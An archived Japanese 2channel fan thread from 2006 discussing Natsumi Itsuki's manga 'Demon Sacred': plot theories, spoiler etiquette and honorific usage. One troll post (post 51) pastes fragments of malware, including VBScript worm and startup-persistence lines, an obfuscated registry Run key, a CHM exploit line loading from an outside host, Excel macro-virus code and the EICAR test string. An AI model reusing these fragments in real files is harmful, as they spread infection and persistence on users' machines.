5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

樹なつみについて語ろう phase19

1 :花と名無しさん:2006/10/16(月) 03:15:15 ID:???0
樹なつみについて語るスレです。マターリといきましょう。
現在「月刊LaLa」にて『デーモン聖典』連載中。

▽前スレ
樹なつみについて語ろう phase18
http://comic6.2ch.net/test/read.cgi/gcomic/1151327355/

▽アニメの話はアニメ板でどうぞ。
・アニメ板↓
 http://anime.2ch.net/anime/
・現行スレ(落ちてた場合は検索しましょう)
【ノイタミナ】☆獣王星 9星目☆【樹なつみ】
http://anime.2ch.net/test/read.cgi/anime2/1151062387

・sage進行でお願いします。
・次スレは970を踏んだ人が立てて下さい。
 できない場合は他の人に依頼しましょう。ex)「975さんおねがいします」
・過去スレは>>2あたりを参照
・雑誌・コミックスのネタバレは発売日正午からです。

2 :花と名無しさん:2006/10/16(月) 03:19:16 ID:???0
▽過去スレ ↓
樹なつみは?
http://salad.2ch.net/gcomic/kako/988/988603004.html
樹なつみについて語ろう phase.2
http://comic.2ch.net/gcomic/kako/998/998468262.html
樹なつみについて語ろう phase.3
http://comic.2ch.net/gcomic/kako/1019/10195/1019553372.html
樹なつみについて語ろう phase.4
http://comic.2ch.net/gcomic/kako/1028/10287/1028736123.html
樹なつみについて語ろう phase.5
http://comic.2ch.net/gcomic/kako/1041/10412/1041220667.html
樹なつみについて語ろう phase.6
http://comic.2ch.net/gcomic/kako/1042/10425/1042509612.html
樹なつみについて語ろう phase.7
http://comic.2ch.net/test/read.cgi/gcomic/1051789548/
樹なつみについて語ろう phase.8
http://comic2.2ch.net/test/read.cgi/gcomic/1062522122/
樹なつみについて語ろう phase.9
http://comic6.2ch.net/test/read.cgi/gcomic/1080200559/
樹なつみについて語ろう phase.10
http://comic6.2ch.net/test/read.cgi/gcomic/1096823633/
樹なつみについて語ろう phase.11
http://comic6.2ch.net/test/read.cgi/gcomic/1111054116/
樹なつみについて語ろうphase.12
http://comic6.2ch.net/test/read.cgi/gcomic/1119689079/
樹なつみについて語ろうphase-13
http://comic6.2ch.net/test/read.cgi/gcomic/1122966944/
樹なつみについて語ろうphase14
http://comic6.2ch.net/test/read.cgi/gcomic/1130237106/
樹なつみについて語ろう phase15
http://comic6.2ch.net/test/read.cgi/gcomic/1140191886/

3 :花と名無しさん:2006/10/16(月) 03:20:13 ID:???0
▽過去スレ続き↓
樹なつみについて語ろう phase16
http://comic6.2ch.net/test/read.cgi/gcomic/1146136569/
樹なつみについて語ろう phase17
http://comic6.2ch.net/test/read.cgi/gcomic/1148561071/
樹なつみについて語ろう phase18
http://comic6.2ch.net/test/read.cgi/gcomic/1151327355/


自分は前スレ970ではなかったのですが…。
前スレがdat落ちしてしまったので、立てました。

4 :花と名無しさん:2006/10/16(月) 06:37:15 ID:???0
>>1
スレ立て乙

5 :花と名無しさん:2006/10/16(月) 11:23:20 ID:???0
>>1
乙です

6 :花と名無しさん:2006/10/16(月) 15:04:09 ID:???0
>>1
乙です。

7 :花と名無しさん:2006/10/16(月) 17:03:45 ID:???0
1乙!
前スレ970、最低〜

8 :あぼーん:あぼーん
あぼーん

9 :花と名無しさん:2006/10/16(月) 18:50:03 ID:???O
>>1 乙です

10 :花と名無しさん:2006/10/16(月) 20:09:00 ID:???0
>>1さん乙〜

11 :花と名無しさん:2006/10/16(月) 23:50:54 ID:???0
>>8
勘弁してくれ('A`)

12 :花と名無しさん:2006/10/17(火) 00:39:05 ID:???0
何で荒らしにレス付けてるの?

13 :花と名無しさん:2006/10/17(火) 10:29:11 ID:???O
>>11-12
理由はわからんが、今年はずーっと少女板に新スレ立つと貼られるトラップ。
スクリプトではなさそうなので、余計に不気味な仕業だけれど
悪質な山崎だと思うしかないと思われ。
どちらかと言うと、何代も続くスレに貼られる傾向があるみたい。

14 :花と名無しさん:2006/10/17(火) 22:44:54 ID:???0
公式が更新されてるよ。
作者コメントが気になるwktk

15 :花と名無しさん:2006/10/17(火) 22:51:18 ID:???0
予告更新されてた。ネタバレ注意




迎えに来たのはアカネさんともお友達の人か。名前忘れたけど。
話が進むそうで楽しみだけどりな方面は少し心配

16 :花と名無しさん:2006/10/18(水) 00:20:41 ID:???0
情報、d!
しかし今回は、吹き出しの文字が読めないな。
以下、バレ含みます↓









アカネさんともお友達の人は、サー・トレヴァー・ソールズベリィだね。
忍を「ぼくのアイスドール」と呼んだw
ヤシを迎えに行かせるとしたら、ヘルは策士だ。
つーか、アカネさんちに身を潜めていることが、ヘルにバレバレw


17 :花と名無しさん:2006/10/20(金) 11:48:34 ID:???0
よく考えたら(考えなくても?)アイスドールってなぁ。

18 :花と名無しさん:2006/10/21(土) 23:55:36 ID:???0
バレスレにバレきてます。
おいら今号走って買いに行く。

19 :花と名無しさん:2006/10/22(日) 00:25:28 ID:???0
このひとの漫画美形設定多すぎ

20 :花と名無しさん:2006/10/22(日) 00:47:31 ID:???0
ええーっ!?の急展開だが、きっと裏があると睨んでいるw

21 :花と名無しさん:2006/10/23(月) 23:00:01 ID:???0
うへー、バレ見たよ
解禁だよな。以下バレ含む




ミカは鎖を切って別世界へ逃げたってカンジだな。
死ぬわけねーだろ。さすがに。
問題はヘルの言葉。
「人権なんか関係ない」っての。元ヘルっぽい発言だなと思った。
ということは、赤龍は別にいて、ヘルが鎖って気がしてきた。
K2のもなに対する行動は、鎖が望むことには
どんなに高位なデーモンでも逆らえないっていうことなのかも。
しかしケルベロスに触れても消滅しなかった・・・っていうのがあるから
やっぱり忍が鎖なのかなぁ〜。あれか?八雲の最後で
死霊と悪霊が1つの身体に入っている・・・っていうのと同じ原理だったりしてw
元ヘルの体を維持するには、赤龍のオーラが必要だったとか やな展開w
てか、ありえねーか

22 :花と名無しさん:2006/10/23(月) 23:00:41 ID:???0
>>21
解禁は明日の12時だよ

23 :花と名無しさん:2006/10/24(火) 01:02:07 ID:???0
釣りだよ、釣り

24 :花と名無しさん:2006/10/24(火) 16:43:03 ID:???0
解禁だよね?



ミカが死ぬわけないだろうというのには、同意。
ただ最高位の赤龍が食う気満々だったとしたら、さすがのミカも消滅だろうから、
赤龍が手加減していた場合のみ、生きているだろう。

赤龍は赤龍で、これほど長い時間を生きているミカをあっさり殺すのはもったいない、
自分と同じく聖典から愛されない生き地獄をもっと味合わせよう、と考えているかもしれない。
ただ別世界に逃がして放置だと、まだ戻って来て画策されると嫌だから、
忍みたいにどっかにコレクションされているかもしれない。

25 :花と名無しさん:2006/10/24(火) 16:48:30 ID:???0
>>21
>「人権なんか関係ない」っての。元ヘルっぽい発言だなと思った。

元ヘルっぽいというより、研究にかこつけてハゲにりなを殺してほしいから、煽っているんだろうと思った。
ハゲはりなを大事に扱う、細心の注意を払うと言っているから。

忍がりなやもなをあんなに守ろうとしている以上、ヘル自身は直接手を下せないんじゃないかな。
で、別の人間を使ってあぼーんさせたいから、研究の美名の下に
「人権になど気遣っていては真の研究などできないだろう。期待しているよ」と。

…しかし、忍が不用意に発言した名前のうち、ミカが消え、りなが捕らわれ、残るは香山さんだけか。

香山さん、逃げて〜!!!



26 :花と名無しさん:2006/10/24(火) 17:48:41 ID:???0
バレあり考察



今月号読んだ。赤龍とりなが目があったとき、赤龍の動きが止まり
りなを見つめて消えたところに何かあるのかなと思った。りなは鎖でも
聖典でもないから、K2のマーキングがあっても消せると思うのに。

ミカはK2曰く『オーラが小さくなってる』と言ってるだけで『消えた』とは
言ってないので、消滅はしてないと思う。消滅してたら萩が消えたときの
様にはっきり言うと思うから。

ヘルの発言は、忍の体調不良に関わってるのかなと思った。
実は忍は死にかけで、ヘル(赤龍?)によって延命されてるのかなと。
ファーストコンタクト時は、忍は自分で立てないほど高熱で衰弱して
いたんだよね。本当はその時に死んでいたかもしれないし、忍本人も
消えたいと願っていたし。デーモンは聖典の危機から守っても病気を
治したり寿命を長くすることはできないと思うんだ。ミカも礼奈の精神
障害を治せなかったし、不思議空間作って時間を止めるのが精一杯
だったし。なので、林博士にりなを使った不老不死の研究を煽ってるのかと。

27 :花と名無しさん:2006/10/24(火) 18:56:32 ID:???0
>>26
殺したいのに 殺せない っていうジレンマじゃね?
忍が鎖、または聖典だとしたらね。
りな にはK2のマーキングもないし、マーキングはあくまで恫喝の意味しかない。

28 :花と名無しさん:2006/10/24(火) 19:58:48 ID:???O
折角大事にするって言ったのにその必要はないと言われてマッドサイエンティストの良心吹っ飛んじゃうかな?
それともあまりのヘルの容赦なさに引くかな、研究対象が死んだら元も子もないし

29 :花と名無しさん:2006/10/24(火) 20:37:15 ID:???0
ヘルは忍がけっこうやばいとおもってて不老不死の研究させるんじゃないのかな。いままでは平気だったけども。なんかあせった感があるよね。

30 :花と名無しさん:2006/10/24(火) 20:42:27 ID:???0
しかしそうだとしたら、忍はけっこうヤバイ状況ってことになるぞ。
もうすぐ死ぬのか?

りなの不老不死は、あくまで もな と双子の姉妹だという絆によるもので
いくら研究しても、到底、後天的に他の人間に適用できるものと思えない。

31 :花と名無しさん:2006/10/25(水) 19:42:17 ID:???0
赤竜の胴体あたりのデザインがしまりがなくてなんか気になる・・・
あと、ミカって翼あったっけ?

32 :花と名無しさん:2006/10/25(水) 21:40:07 ID:???O
ミカ大好きだよ(*´д`)ミカ
ミカは異世界で元気に生きてるよ!

33 :花と名無しさん:2006/10/25(水) 22:03:10 ID:???0
ミカは絶対死んでないと踏んでる。
それよりも体操のお兄さんが何故消えたのかの方が気になる…。
何もされてないのに。

34 :花と名無しさん:2006/10/25(水) 22:11:21 ID:???0
ミカが謎の世界へ逃げる時の糧にしたとか…

35 :花と名無しさん:2006/10/25(水) 22:21:38 ID:???0
>>33
その後に赤龍が消えたのと同じ感じで消えたんで、赤龍に操られてるんじゃないかと思った
記憶がないのは赤龍関連だろうし、一応K2との敵対フラグもあるんだよな>お兄さん

36 :花と名無しさん:2006/10/25(水) 22:33:35 ID:???0
そんなフラグがあったことを今思い出した。

ヘルが敵視してるのはりなだけ?もなはK2がいるから保留か。

37 :花と名無しさん:2006/10/26(木) 01:38:28 ID:???0
ネタバレ見たときはどうなる事かと思ったけど2人とも生きてそうだな〜
続きが気になるんで休載なしで頑張ってほしい。次号が楽しみだよ。

あとコミックス、12月に9巻発売されなければ今年は1巻だけになっちゃうのか
閨人の隊長とか直ってるといいな…

38 :花と名無しさん:2006/10/26(木) 03:03:48 ID:???0
12月に新刊を読みたいな。無理かな…。

そう言えば最近、デーモンはページ数が減っていないか?
昔は4話で1巻分あったのに。

LaLaでは人気がないんだろうか。
1回40ページくらいが、30ページくらいなっている。

39 :花と名無しさん:2006/10/26(木) 11:38:50 ID:???0
ミカは死んでないに一票
りなもなが小さいときにたしかミカが他の人に見つからないように
気配を消してた(違う空間で過ごしてたんだっけ?)くらいだから
自分の気配消すのなんて分けないとオモ。
気配消して傷を治して再び登場
…してクレー!


40 :花と名無しさん:2006/10/26(木) 14:24:24 ID:???O
気配消す結界はるのはスゴく力を使うから今のミカには出来ないと思う・・・
けどミカは生きてるよ!(・∀・)

41 :花と名無しさん:2006/10/26(木) 19:23:18 ID:???0
りな・・・。手痛いしっぺ返しを食らったな。


42 :花と名無しさん:2006/10/26(木) 19:52:13 ID:???O
>>19
美形が出てこない少女漫画って少なくないか?

43 :花と名無しさん:2006/10/26(木) 23:05:57 ID:???0
>>19
では、格闘家の武蔵とか桜庭が主役の漫画が読みたいのか?


44 :花と名無しさん:2006/10/27(金) 12:50:25 ID:???O
金髪美形マンセーだからこの人の作品好きだ
ミカ大好き(*´д`)でも立人も好きだった

45 :花と名無しさん:2006/10/27(金) 15:23:03 ID:???0
みかしんだんでしょ?あんなにオーラがでて
異界ななんてにがられる?

46 :花と名無しさん:2006/10/27(金) 18:13:59 ID:???0
流れ切って
ミス・ゾフィてーのとサー・ソールズベリィって呼び方が気になる。
Miss.とかMr.は+Last nameで、Sirは+First name。
ナイトの称号はあくまで個人のものだから、
家名や屋号につけて呼ぶと却って失礼なんだけどなあ。
アメリカ人だからめんどくさい格式は(゚ε゚)キニシナイ!! なのかなあ。
アメリカは新聞からして、ダイアナ元妃の称号間違ったまま報道してたし。
そういう家風とすれば、リンデルツ父が
ペンドルトン伯爵に嫌われるのも当然だと思うな。

りながミカの血浴びてたけど、何かの伏線になるのかな。
しかしそのページの擬音、「ウザッ」って書いてあるみたいに見える…。

47 :花と名無しさん:2006/10/27(金) 18:21:35 ID:???0
ミスっていう敬称も気になった
今時はミズって呼びかけるような・・・・
男女平等がどーたらこーたらでミスっていう敬称だと不公平だっつって
(男は未婚既婚問わずミスターなのに、何で女は分けるのよっ!って)
ミスでもミセスでもどっちにも使えるミズって言うんじゃなかったっけ?
うろ覚えですんませんが

48 :花と名無しさん:2006/10/27(金) 19:28:39 ID:???0
MissはMiss、MrsはMrs。
Misは、一見してどっちか分からない時に呼びかけるもの。
すぐ相手が、「私はミス」「ミセスよ」と教えてくれるのでそれに従う。
変な配慮してミズミズ連呼するほうが非礼だと思う人のほうが多いよ、海外では。
まあ、相手の要望通りに呼べばいいんだけどね。

確かに男女平等ということでそういう動きはあるけど、
あくまで一部の人間が主張していることだから、世界の常識って訳ではない。
日本はそういう人たちの勢力が強いから、それが当たり前と思いがちだけど、
総理が、そりゃ行き過ぎだから見直すぞと言ってるでしょ?

(関係ないけど、東大のそれ推進してる教授が根拠にしてる症例が、
カナダの男児の一卵双生児なんだよね。ハーバード卒の博士に実験動物に
されて、去年三十路くらいで自殺。博士は学会から干された。
ちょっとデーモンの双子ちゃん連想)

49 :花と名無しさん:2006/10/27(金) 19:31:58 ID:???0
>>48
うろ覚えで発言したので、詳しい解説ありがとう
勉強になるな・・・樹スレは

50 :花と名無しさん:2006/10/27(金) 21:18:48 ID:???0
>>46
確認した…



ホントだ。ウザッに見える。

51 :<body onload=window()>:2006/10/28(土) 00:03:44 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


52 :花と名無しさん:2006/10/28(土) 20:59:02 ID:???0
謎が謎を呼ぶなぁ
先の展開が読めんよ・・・・

53 :花と名無しさん:2006/10/28(土) 23:06:37 ID:???O
ミカ大好き(*´д`)

54 :花と名無しさん:2006/10/29(日) 11:48:13 ID:???0
ミカ消失のピンチになってようやくとはいえ
最近ミカ好きレスが復活してきて密かに楽しんでいるw

自分今号で赤龍にちょっと萌えた。
なんだあいつ強すぎだろ。
K2対抗できんのかね。
まともに少年漫画のようにやるんじゃなくて赤龍の場合何か駆け引きがありそうだけど。

55 :花と名無しさん:2006/10/29(日) 16:55:01 ID:???0
最高位ですからー。

相変わらず、りなは自分の何が問題なのか
分かったように見えないところが嫌だ…。
すぐ謝ってたけど、どうせ同じ状況になったらまた同じことすんだろ?
オメーにとって前々回の発言は、
無理は分かってるけど言ってみるだけは言ってみたわ、キャハ☆
みたいな程度の低い問題なん? と思ってしまって、心狭い。
赤龍の邪魔が入ったけど、仮にそのまま逃げられたとしても、
他の10人の「鎖」を見捨てたって嫌な現実を子どもたちに
事態進行中に突き付ける訳だし、そんなの気配り名人でもなんでもないし。

にしても、「鎖」5人集合してるくらいで
数万人消せるほどデーモンを集められるのなら、
「鎖」が13人以上いる支部は、局員が出勤するのも命がけなんじゃない頭。

56 :花と名無しさん:2006/10/29(日) 23:34:13 ID:???0
今月号、やっとゲットできた。
笑えたのは、サー・ソールズベリィの忍の親友という自己紹介に、もなが
「忍ちゃんの…」(いたの友達)
なリアクションだ。全くだwww

あと、ゾフィがまたお着替えしていて、笑えた。
K2に会うからって、気合い入っているなぁ。

そのゾフィとアカネさん、K2に同じことして同じリアクション食らっている…。
K2にひっついて、嫌そうに引き離されるという。
この2人、メンタリティが似ているねw


57 :花と名無しさん:2006/10/29(日) 23:37:07 ID:???0
ところで、みんなはミカがどうなったと思う?

1.死んだ
2.逃げた
3.赤龍にコレクションされた

さあ、どれだ?

58 :花と名無しさん:2006/10/30(月) 00:33:03 ID:???0
コレクションww

違う次元にミカ自らじゃなくて赤龍に持ってかれた、とかだったら確かにコレクションだな。

59 :花と名無しさん:2006/10/30(月) 00:43:34 ID:???0
んじゃ

3.赤龍に拉致監禁された

に訂正w

60 :花と名無しさん:2006/10/30(月) 00:53:41 ID:???0
>>54
りなより、他の鎖の子供たちや侑君の方が状況を正確に把握していたね。
自分たちより、りなを心配してくれて…。
それなのに、りなったら。
りなの軽率な行動のせいで、ミカまであぼーんかもよ?

もう普通人と体質の変わらない侑君をこのままデーモンに接触し放題のSMICに置いておく方が危険なんだけどね。
いくらK2のマーキングがあっても、侑君がデーモンに恍惚の師を与えたことは世界中のディーヴァにバレてしまった。
わざとデーモンに接触させようとするディーヴアが出てきかねない。

どうしても侑君と話したかったなら、SMICに来てすぐ、侑君を連れて脱出すれば良かったのに。
長々と話し込んで、何を考えているんだ?
りな自身だけでなく、侑君も危険に晒していると気付かないのかな。
しかも真実ではない作り話を話すだけ話したら、バイバイするつもりだったの?
ろくに接触のない10人のお友達を見捨てるより、ここまで関わった侑君をSMICに見捨てて命の危険に晒す方が、よっぽど非情だ。 

61 :花と名無しさん:2006/10/30(月) 09:05:29 ID:???O
っかクライマックス入った?
SMIC崩壊?デーモン暴走ミカ不明…

どう風呂敷が畳まれるのか気になる
というか、この作品のハッピーエンドって何?

62 :花と名無しさん:2006/10/30(月) 10:05:46 ID:???0
みんなで南の島で暮らす

63 :花と名無しさん:2006/10/30(月) 13:16:09 ID:???0
りなの病気が治る
忍ちゃんの眉間の皺がなくなる
南の島で結婚式→宴会(やけ酒含む)
デーモンが聖典の愛で死ぬことに何らかの答えがでる

K2は消滅でも恍惚でも転生でもどれでもまあいいや…

64 :花と名無しさん:2006/10/30(月) 13:36:57 ID:???0
転生は、もうやめてくれ

65 :花と名無しさん:2006/10/30(月) 16:20:42 ID:???O
誰の結婚式だよw

66 :花と名無しさん:2006/10/30(月) 16:52:47 ID:???0
とりあえず、りな救出&SMICの動向&赤龍の秘密が絡んで動いていくな。
そこへミカの陰謀(?)も加わりそう…。
忍はへたれつつも結局皆に救い出される眠り姫ポジションだと思われ。

67 :花と名無しさん:2006/10/30(月) 20:38:26 ID:???0
忍元気になって長生きする。死なないヘルに永久に苛められる。
双方にとって至極のハッピーエンド(゚д゚)ウマー

68 :花と名無しさん:2006/10/30(月) 23:08:05 ID:???0
そのうちヘルとK2は会うのかな。赤龍とも会って出生の秘密キボン。
過去スレの予想が当たってお母さんだったらどうしようかと思ってるw

>>67
ヘルムート、或いは赤龍乙

69 :花と名無しさん:2006/10/30(月) 23:16:24 ID:???0
>>56
ゾフィは、オスカル様みたいな男っぽいビラビラだったね。
服装はともかく、髪をストレートパーマにし直すなら、そうとう時間が掛かっているんじゃなかろうか。

>>68
お父さんが人間でハーフという説だね?
その場合、K2は人間として生きられそうだから、もな的にはおk。
ただ姑が赤龍というのは嫌だろうな。

70 :花と名無しさん:2006/10/31(火) 11:40:22 ID:???0
多分最後はオズの最後みたいに
それまで生きていたみんなの顔と南の島の景色が写って
主人公のモノローグで終わり。
全体的にこの終わり方が圧倒的に多いからな。
死ぬ(消える)のはK2含むデーモン全部&りなだな。
もな、ゾフィ、ケイトあたりは死なない。忍は微妙。
もしデーモンが生き残ったら、「OZ」が「オズの魔法使い」なら
これはピノキオで、ゼベットじいさんが赤龍、ピノキオがK2
人間にする女神が、もな。もしくは死にかけた、りな。
ミカと赤龍は絶対に死ぬだろな。
これらがいなくならないと話が終わらないw
漫画喫茶で読みたいのに 近所の漫画喫茶にはララが置いてない。
愛知県下でララのある漫画喫茶教えてくれ〜〜〜OJにはないぞ

71 :花と名無しさん:2006/10/31(火) 13:14:10 ID:???0
漫画喫茶に行くなら、LaLa買った方が安いんじゃね?

72 :花と名無しさん:2006/10/31(火) 13:52:25 ID:???0
もっとSF色が強かったら1ページ使ってキノコ雲が描かれたであろう。今回は無いかな。

ゆう遊空間は女性向け雑誌が割とそろってる印象がある。
マンボーは行った事あるけど覚えてないや>>70

73 :花と名無しさん:2006/11/02(木) 17:37:55 ID:???0
来月の5日にデーモンの新刊でるね

74 :花と名無しさん:2006/11/02(木) 17:59:54 ID:???0
表紙の色の予想がさっぱりつかないな

75 :花と名無しさん:2006/11/02(木) 18:00:25 ID:???O
まじっすか!?
情報サンクス!

それにしてもほんとに年内ぎりぎりだな〜。

76 :花と名無しさん:2006/11/04(土) 20:46:44 ID:???0
デーモンが消滅してそれでSMICも消滅する?
ヘルムートや主要幹部がいなくならないと
もなりな、忍に平和はこない気がするお

77 :花と名無しさん:2006/11/04(土) 21:45:42 ID:???0
どっちかっつーと、ヘルさえ消滅すれば、後は何とかなりそうだ。


78 :花と名無しさん:2006/11/06(月) 11:33:50 ID:???0
12月発売のデーモンどの話まで入るんだろうな

79 :花と名無しさん:2006/11/06(月) 13:11:41 ID:???0
あのとき赤龍はあの爪でりなをザクッとやりたかったんだろーなー

80 :花と名無しさん:2006/11/06(月) 13:42:52 ID:???0
げに恐ろしきは男の嫉妬
赤龍が男という性別あるのかは知らないがw

81 :花と名無しさん:2006/11/07(火) 04:25:58 ID:???O
久々に花咲け読んだら面白かった
男キャラみんないいけど立人はやっぱり最高だ

82 :花と名無しさん:2006/11/11(土) 23:59:43 ID:???0
忍が実はデーモン てオチはないよな。

83 :花と名無しさん:2006/11/12(日) 00:07:24 ID:???0
>>82
このスレでは、それじゃやっぱり収まりが悪い、って結論だったっけ。

84 :花と名無しさん:2006/11/12(日) 00:44:33 ID:???0
八雲に収録されてた『左の炯』とやらがどうなったか知ってる人います?
欄外で誰か別の人に続き書いてもらうと言っていたのを記憶してます。
もしかして『しゃにむにGO』とやらではないですよね。
地味に気になってるんですが…

85 :花と名無しさん:2006/11/12(日) 00:58:22 ID:???0
続編を別の人に描いてもらうって話だよね?
あれはポシャったとファンの人に聞いたけど、確かな情報ではない

86 :花と名無しさん:2006/11/12(日) 14:50:08 ID:???O
>>82
過去にいろんな人触ってるけど誰も消えてないからそれはないんじゃないの?
面白いけど。

87 :花と名無しさん:2006/11/12(日) 17:00:27 ID:???0
人間に化けたwら
触っても消えないんじゃなかったか?
双子に触りまくりのミカはどうなるんだww

88 :花と名無しさん:2006/11/12(日) 17:23:23 ID:???0
鎖であることを隠すならともかくデーモンだってことは隠すの無理でしょ

89 :花と名無しさん:2006/11/12(日) 21:48:47 ID:???0
そういえば、目の下にクマがあるのがデーモン?て
言われた時期があったな

90 :花と名無しさん:2006/11/12(日) 22:22:54 ID:???0
>>88
鎖の命令で自分の記憶まで操作した…とか。無理矢理すぎる展開になるけど。

普通に考えたらヘルがデーモンだよね。
忍から愛されようとしてるし。

91 :花と名無しさん:2006/11/12(日) 23:14:10 ID:???0
>>89
エットーレデーモン説はゾフィに3人揃ってつっこみしてるのを見て個人的に消えた
今月の「局長がいません」はブラフかな

92 :花と名無しさん:2006/11/20(月) 16:36:42 ID:???0
うわ、全然書き込みなかったんだ
落ちそう

93 :花と名無しさん:2006/11/20(月) 16:56:46 ID:???0
公式更新、まぁだ?

94 :花と名無しさん:2006/11/20(月) 22:42:51 ID:sAPjAitU0
おマンコ臭い

95 :花と名無しさん:2006/11/21(火) 03:54:48 ID:???0
更新来ましたよっと。今回遅かったね。以下ネタバレ








全員のなかにミカとヘルムートは入ってるのかな。話しは進まなそうだけど読み応えはありそう。

96 :花と名無しさん:2006/11/21(火) 04:51:51 ID:???0
>>95
d! 見てきました。
以下バレ。




















もなの科白の文字が潰れて、半分くらい読めない…orz
大体の内容は想像つくけど。
さあK2、次の科白は!?

今回のネタバレ下絵を見て、K2ハーフ説を信じたくなったよ。
もなは聖典ではなくて、恋人だったりねw

97 :花と名無しさん:2006/11/21(火) 22:28:36 ID:???0
早売りバレきてるよ。
ここの住民かな。わかりやすくてGJ。

98 :花と名無しさん:2006/11/21(火) 23:27:44 ID:???0
>>97
d!
以下バレ。


















ブラグ、キタ━━━━━━(゚∀゚)━━━━━━ !?

にしても、もな、いい子だ…!
望むこと、良かれと思うことに対する姿勢がね。

ここ何ヶ月か、りながデーモンの力を当てにして、周囲を振り回して結果的に
最悪の事態を引き起こしたしまったことに、歯がゆい思いで見ていただけに尚更。

いや、りなも、別に嫌いじゃないけど。
しかしこんなに我慢したもなには、最悪の結果は迎えてほしくない。可哀想過ぎる。


99 :花と名無しさん:2006/11/22(水) 00:31:52 ID:???0
96と98は同じ人?

バレ感想はやめてくれないかな。
改行すればいいというものでもないだろ…。
早売りの感想は感謝がてら、向こうに書け(しかし程々に)

100 :花と名無しさん:2006/11/22(水) 04:20:24 ID:???0
向こうに書くのを勧めるのは止めろ
それであのスレ荒れたのに
あそこは基本的に感想一切厳禁だよ

101 :花と名無しさん:2006/11/22(水) 06:19:38 ID:???0
>>96=98
バレ解禁は、発売日の正午からだろ!>>1嫁
発売日の正午過ぎてから、コミクス派の人を考えて
『バレあり』と書いて数行空けるんだよ

102 :98:2006/11/22(水) 18:19:33 ID:???0
大変失礼しましたm(__)m。ごめんなさい。

103 :花と名無しさん:2006/11/22(水) 19:22:30 ID:???0
正午すぎてからはあけなくていいのでは。
数行あけてるのは今んとこ作者サイトの話。
少ししか内容はわからないようにはなっているけど、
それでもまったく知らない状態で読みたい人もいるしね。
そのへんちょっと混乱してきてるな。

104 :花と名無しさん:2006/11/22(水) 21:22:21 ID:???0
自分も正午からあけるのは無くてもいいと思う。
コミックス派の意見も聴きたいけど今は居ないかな。
公式のネタバレ自体は数行入れれば可なんだよね?
・公式の下絵ネタバレは数行あけて書くようにしましょう。
とかテンプレに入れるか。早い話だけど明文化もされて無かったし。

105 :花と名無しさん:2006/11/22(水) 21:59:40 ID:???0
あと勘違いしている人もいるようだが、あっちのネタバレスレにネタバレ内容の感想を書くのは基本的にNGだよ。
ネタバレの書き方についての感想(よくまとまっている、解りやすいetc)ならともかく、
内容の感想に及んだら、他のネタバレ投下を待っている人たちの顰蹙を買って追い出される。

乙コールやネタバレの書き方の感想も、多くて3個程度に抑えないと騒動になりかねない。
遙かだっけ、ちょっと前も騒ぎになって、ひどかった。
このスレも別にネタバレスレを立てなくてはいけないような騒動は勘弁してほしい。

106 :花と名無しさん:2006/11/22(水) 22:43:48 ID:???0
>>105
遙か某キャラスキーの暴走も前にあったけど、
この前はコルダの方じゃなかった?
ねだる方がしつこくて、バレ来たら来たで
ぎゃあぎゃあ叫んでいたし

107 :花と名無しさん:2006/11/22(水) 22:53:15 ID:???0
>>106
その頃ネタバレスレをチェックし損ねていたのか、ちょっと記憶にない。
コルダは今回、しつこくリクが続いて冷や冷や見ていた。

1度顰蹙を買うと、ネタバレも投下してもらいにくくなるから、お行儀よくしたいよね。

108 :花と名無しさん:2006/11/23(木) 01:42:37 ID:???0
あそこはリクも1作品1回のルールだからなぁ…
続く多くのリクに流れたっぽい時は、さり気なく雑誌別のマダー&キター作品一覧をまとめる等、工夫汁

109 :花と名無しさん:2006/11/23(木) 02:06:55 ID:???0
一応覗いてみたが他作家スレはあまり参考にならんなw
まあ、ほどほどに空気嫁ってことで

110 :花と名無しさん:2006/11/23(木) 04:55:19 ID:???O
K2だけには幸せになってホスィ…

111 :花と名無しさん:2006/11/23(木) 09:50:21 ID:???0
K2だけでいいのかよww

112 :花と名無しさん:2006/11/23(木) 13:53:27 ID:???O
K2の幸せ→もなの幸せ→りなの幸せ→忍の幸せ→ヘルの幸せ

無問題

113 :花と名無しさん:2006/11/23(木) 19:18:05 ID:???0
しかし忍がヘル抜きで幸せになっても、ヘルは邪魔してばっかだし、幸せそうに見えないなぁ…w

114 :花と名無しさん:2006/11/23(木) 19:49:32 ID:???0
>>112
K2の幸せ→もなの幸せ→りなの幸せ→面白くないヘル→忍ガクブル→ヘルの幸せ

あれ?

115 :花と名無しさん:2006/11/23(木) 20:12:42 ID:???0
ワロタwww

116 :花と名無しさん:2006/11/23(木) 23:11:36 ID:???O
>114
ちょwwwおまwww

117 :花と名無しさん:2006/11/25(土) 00:36:14 ID:???0
>>114
ワラタw

118 :花と名無しさん:2006/11/25(土) 06:12:04 ID:???0
でもその通りという気がw

119 :花と名無しさん:2006/11/25(土) 18:15:49 ID:???O
この流れで行くとラスボスはヘルだな

しかし最近もなが可愛くなってきた気が
K2超ウラヤマシス

120 :花と名無しさん:2006/11/26(日) 03:02:53 ID:???0
ヘルムートは結局、部下に双子ちゃんを迎えに行かせなかったんだね。
それともゾフィが横から「私が行くわ!」とやめさせたのか。
ゾフィもすぐ行くように見せかけて、一晩経った後に迎えにきてるし。

話し合うから家で待て、双子は(ryとヘルムートは言ったのに、
